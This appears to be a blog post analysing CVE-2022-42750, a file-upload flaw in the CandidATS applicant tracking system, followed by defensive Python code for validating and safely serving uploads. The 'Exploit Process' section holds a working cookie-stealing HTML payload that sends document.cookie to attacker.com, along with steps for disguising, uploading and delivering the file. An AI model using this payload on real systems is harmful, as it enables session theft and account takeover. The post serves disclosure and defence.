CandidATS, a popular open-source applicant tracking system, is widely used by recruiters and businesses to manage their hiring process. A serious vulnerability (CVE-2022-42750) has been found in CandidATS version 3.., which allows an external attacker to steal the cookies of arbitrary users. The vulnerability is caused by the application's failure to properly validate files uploaded by a user.

This long-read post aims to provide an in-depth analysis of this vulnerability, including the exploit details, code snippets, and links to original references.

Vulnerability Details

The main issue in CandidATS v3.. lies in its poor validation of user-uploaded files, particularly when it comes to handling file extensions. An attacker can upload a malicious HTML file with a disguised file extension, which CandidATS will then store without validating its content.

When a user visits the link containing the malicious file, their browser will execute the malicious code, ultimately leading to the theft of their cookies. With these stolen cookies, an attacker can impersonate that user within the CandidATS application.

Exploit Process

1. The attacker starts by preparing a malicious HTML file that contains JavaScript code to steal the user's cookie. Here's a simple example of such a file:

<!DOCTYPE html>
<html>
<head>
  <title>Malicious File</title>
  <script>
    function stealCookie() {
      var xhr = new XMLHttpRequest();
      xhr.open('POST', 'https://attacker.com/cookie', true);
      xhr.setRequestHeader('Content-Type', 'text/plain');
      xhr.send(document.cookie);
    }
    stealCookie();
  </script>
</head>
<body>
  This is a malicious file for CVE-2022-42750 exploit demonstration.
</body>
</html>

In this example, the JavaScript code sends the stolen cookie to the attacker's server at https://attacker.com/cookie.

2. The attacker then disguises the malicious HTML file by changing its extension. One way to achieve this is by simply appending a fake extension, e.g., changing "malicious.html" to "malicious.html.jpg".

3. With the file prepared, the attacker now uploads the malicious file to CandidATS using any file upload functionality provided by the platform. Since the application fails to properly validate file types, the disguised HTML file will be successfully uploaded and stored on the server.

4. The attacker sends the direct link to the stored malicious file to the targeted user(s) via email or other communication methods. When an unsuspecting user clicks on the link, their browser will render the HTML file and execute the embedded JavaScript code, allowing the attacker to steal their cookies.

References

- Original Advisory by ISSR Lab
- NIST National Vulnerability Database (NVD) Entry
- Exploit Database Entry

To protect yourself against this vulnerability

1. Update your CandidATS installation to the latest version, as the developers might have already addressed this issue in subsequent releases.
2. Implement proper file validation mechanisms in your application, e.g., checking both file extensions and MIME types, to prevent unauthorized file uploads.
3. Restrict access to user-uploaded files by implementing access controls, such as session-based authentication or API key authentication, to prevent unauthorized users from accessing sensitive data.
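The validation that the list above calls for, and the reason the disguised "malicious.html.jpg" file from the exploit section slips past a naive extension check, shown as an added Python example. This is illustrative code written for this post, not part of CandidATS or the original advisory. It assumes a small allow-list of image and PDF types, rejects a file whose final extension does not match its leading bytes or whose name carries a second extension, stores accepted files under a random name, and serves them with headers that stop the browser from rendering them as a page; ALLOWED_MAGIC, HTML_MARKERS, validate_upload, stored_name, download_headers and can_download are names chosen here.

```python
"""Upload validation and safe serving for user-supplied files.

Added example (not CandidATS code): the checks that stop a disguised HTML
file such as "malicious.html.jpg" from being stored and later rendered as a
page by a victim's browser.
"""
import os
import re
import secrets

# Allowed extensions mapped to the magic bytes a genuine file must start with.
ALLOWED_MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".pdf": b"%PDF-",
}

# Markup that would make a browser treat the body as an HTML document if the
# file were ever served with a wrong or sniffable Content-Type.
HTML_MARKERS = re.compile(
    rb"<\s*(!doctype|html|head|body|script|iframe|svg|meta)\b", re.IGNORECASE
)


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for a candidate upload."""
    name = os.path.basename(filename.replace("\\", "/"))
    root, ext = os.path.splitext(name)
    ext = ext.lower()

    # "malicious.html.jpg": only the final extension is trusted, and a dot
    # elsewhere in the name is treated as a double-extension attempt.
    if not root or "." in root or any(ord(c) < 32 for c in name):
        return False, "rejected filename"
    if ext not in ALLOWED_MAGIC:
        return False, f"extension {ext or '(none)'} not allowed"
    # The declared type must match the bytes actually uploaded; the client's
    # Content-Type header is attacker-controlled and is not consulted at all.
    if not data.startswith(ALLOWED_MAGIC[ext]):
        return False, "content does not match extension"
    # Active markup near the top of a supposedly binary file is still refused,
    # even when the magic bytes were prepended to satisfy the check above.
    if HTML_MARKERS.search(data[:2048]):
        return False, "HTML markup found in binary upload"
    return True, "ok"


def stored_name(ext: str) -> str:
    """Random on-disk name: the user's filename never reaches disk or a URL."""
    return secrets.token_hex(16) + ext.lower()


def download_headers(original_name: str) -> dict[str, str]:
    """Headers that force a download and forbid MIME sniffing on the way out."""
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", original_name)
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def can_download(session_user_id, owner_id, is_admin=False) -> bool:
    """Access check: only the uploader (or an admin) may fetch the file."""
    return is_admin or (session_user_id is not None and session_user_id == owner_id)


if __name__ == "__main__":
    # Constructed samples: the post's HTML payload renamed to look like an
    # image, and a minimal genuine JPEG header.
    disguised = b"<!DOCTYPE html><html><head><script>stealCookie()</script></head></html>"
    real_jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
    for fname, blob in [("malicious.html.jpg", disguised), ("photo.jpg", real_jpeg)]:
        print(fname, validate_upload(fname, blob))
```

Two points matter for this specific bug. First, the MIME type the browser sends with the upload is chosen by the uploader, so "checking MIME types" has to mean inspecting the bytes, as validate_upload does, not trusting the request header. Second, step 4 of the exploit only works because the stored file is rendered inline; forcing a download with `Content-Disposition: attachment` and `X-Content-Type-Options: nosniff` removes that path even for files that somehow got past validation, and can_download keeps the link from being useful to anyone who is not the owner.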

Timeline

Published on: 11/03/2022 18:15:00 UTC
Last modified on: 11/04/2022 15:04:00 UTC